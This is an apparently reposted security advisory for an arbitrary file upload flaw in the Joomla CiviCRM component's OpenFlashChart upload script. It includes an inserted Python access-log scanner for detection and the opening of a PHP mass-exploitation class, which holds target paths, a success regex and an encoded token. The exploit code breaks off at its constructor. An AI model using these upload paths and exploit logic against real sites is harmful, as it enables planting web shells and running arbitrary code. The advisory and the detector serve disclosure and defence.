Joomla Civicrm Component Arbitrary Shell Upload Vulnerability Download

Source: 黑吧安全网 Views: 1729 Date: 2014-04-30

Affected systems:

Joomla! Civicrm

Description:


BUGTRAQ  ID: 59372

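Joomla Civicrm is a membership and constituent relationship management system for organizations.

The Joomla Civicrm component contains an arbitrary file upload vulnerability. An attacker can use it to upload arbitrary files to an affected system, which leads to arbitrary code execution.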

<*Source: miyachung
  *>
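
A defender-side check for this issue, as an added example that is not part of the original advisory: it scans web server access logs for POST requests to the ofc_upload_image.php path used in the test code on this page whose name parameter is not an image, and for later requests to non-image files under tmp-upload-images. The Combined Log Format, the image extension allow-list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Tail of the two paths that appear in the test code on this page (lower-cased).
UPLOAD_SCRIPT = "/packages/openflashchart/php-ofc-library/ofc_upload_image.php"
UPLOAD_DIR = "/packages/openflashchart/tmp-upload-images/"
IMAGE_EXT = {"png", "jpg", "jpeg", "gif", "bmp"}  # assumed allow-list

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def clean(name):
    """Basename, lower-cased, cut at a NUL byte, trailing dots/spaces removed."""
    name = name.split("\x00")[0].replace("\\", "/")
    return name.rsplit("/", 1)[-1].rstrip(". ").lower()

def is_image(name):
    return "." in name and name.rsplit(".", 1)[1] in IMAGE_EXT

def scan(lines):
    """Return (kind, client_ip, file_name, status) for each suspicious request."""
    findings, uploaded = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        url = urlsplit(target)
        path = unquote(url.path).lower()
        if path.endswith(UPLOAD_SCRIPT) and method == "POST":
            name = clean(parse_qs(url.query).get("name", [""])[0])
            if not is_image(name):
                uploaded.add(name)
                findings.append(("non-image-upload", ip, name, int(status)))
        elif UPLOAD_DIR in path:
            name = clean(path)
            if name and not is_image(name):
                kind = "uploaded-file-requested" if name in uploaded else "non-image-in-upload-dir"
                findings.append((kind, ip, name, int(status)))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
BASE = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart"
SAMPLE = [
    f'198.51.100.7 - - [30/Apr/2014:10:00:01 +0000] "POST {BASE}/php-ofc-library/ofc_upload_image.php?name=x1.php HTTP/1.1" 200 312',
    f'198.51.100.7 - - [30/Apr/2014:10:00:03 +0000] "GET {BASE}/tmp-upload-images/x1.php HTTP/1.1" 200 15',
    f'203.0.113.9 - - [30/Apr/2014:10:05:00 +0000] "POST {BASE}/php-ofc-library/ofc_upload_image.php?name=chart.png HTTP/1.1" 200 20',
    f'203.0.113.9 - - [30/Apr/2014:10:06:00 +0000] "GET /index.php HTTP/1.1" 200 5120',
]
```

On the sample, `scan(SAMPLE)` reports the x1.php upload and the follow-up request for it; pass an open access log file to `scan` to check real traffic.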

Test method:


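Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!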

<?php

set_time_limit(0);
ob_start();
class exploit
{
  private $uploaded_file_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/";
  private $post_url_path    = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=";
  private $filename;
  private $url;
  private $file_to_upload;
  private $if_is_uploaded    = "/Undefined variable: HTTP_RAW_POST_DATA/si";
  private $thread_maxsize;
  private $site_list;
  private $file_regex;
  private $save_file      = "uploaded.txt";
  private $user_agent      = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1";
  private $timeout_sec    = 20;
  private $token        = "WVVoU01HTkViM1pNTTFKdldsY3hjR050ZEhCaWFUVjJZMjFqZGxreU9YUk1NMDVvWkcxV2RXRlhaRzVaVXpWM1lVaEJQUT09";
  private $idnum        = 31;
  
  public function __construct($site_list,$filename,$thread,$regex)
